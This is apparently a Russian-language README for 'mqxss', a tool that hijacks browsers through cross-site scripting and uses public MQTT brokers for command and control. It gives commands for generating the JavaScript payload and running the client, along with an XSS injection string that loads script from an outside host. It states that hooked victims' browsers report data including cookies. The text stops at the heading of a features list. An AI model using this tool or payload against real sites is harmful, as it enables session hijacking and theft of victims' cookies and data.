
Связь с захваченным браузером через MQTT

Преимущество использования этого инструмента по сравнению с beef или xsshunter в том, что помимо размещения JS-пейлоада не требуется настраивать инфраструктуру — можно использовать публичный брокер (однако в настоящее время применяется обфускация, шифрование в разработке).
Перехваченные браузеры будут общаться в MQTT-топике на указанном вами брокере. Для тестирования доступно множество публичных/бесплатных брокеров.
Клиент использует библиотеку python paho.mqtt, а JS-пейлоад использует 'mqttws31.min.js', который загружается отсюда: 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.

Чтобы сгенерировать JS-пейлоад для перехвата браузеров, укажите флаг -g при запуске вместе с переменными вашего брокера, порта и топика. Это создаст ваш пейлоад в папке /js/.
Чтобы запустить клиент, укажите ваш брокер, порт и топик следующим образом:
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname
Чтобы запустить клиент с учетными данными, укажите ваш брокер, порт, имя пользователя, пароль и топик следующим образом:
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password
Отправьте ваш XSS-пейлоад жертве, пока запущен клиент mqxss, например: '"><script src=https://example.com/x.js async></script> или что-то подобное. Если сайт уязвим, вы должны получить уведомление о том, что браузер подключился, с некоторыми базовыми данными, включая cookie и т.д.

Возможности: